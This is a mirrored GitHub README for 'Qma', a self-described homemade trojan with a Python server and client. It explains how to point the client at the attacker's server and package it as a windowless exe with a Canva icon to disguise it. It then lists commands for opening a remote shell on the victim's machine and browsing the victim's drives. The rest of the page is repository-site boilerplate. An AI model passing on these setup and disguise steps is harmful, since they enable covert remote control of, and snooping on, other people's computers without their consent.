Giter Club home page Giter Club logo

qma's Introduction

Qma

自制小木马,一个客户端,一个服务端(持续更新中...)

使用方法

1. 修改server.py

HOST = '172.29.41.16' #HOST为服务器IP,如果是公网服务器,要修改为公网服务器的内部ip
PORT = 65000  #端口

2.修改client.py

HOST = '172.29.41.16'  #服务器IP
PORT = 65000 #和服务器端口一致

设置完之后可以将client.py打包成exe更佳,打包方法

#在CMD输入,安装pyinstaller库
pip install pyinstaller -i https://pypi.tuna.tsinghua.edu.cn/simple/
#打包成exe
pyinstaller -F -w -i canva.ico client.py

3.运行server.py

python server.py

等待客户端启动

功能介绍

1.启动客户端cmd功能

cmdon:

(例:查看对方C盘目录)

dir /d /a C:

1

(例:打开记事本)

notepad

1

(例:ping百度)

1

关闭cmd

cmdoff

1

2.查看对方目录

使用dir命令太过繁琐

可以直接使用tron

打开功能

tron

1

查看E盘文件,命令E://

1

关闭功能

troff

1

3.主动关闭连接

命令exit

1

qma's People

Contributors

xuanqiongii avatar

Watchers

 avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.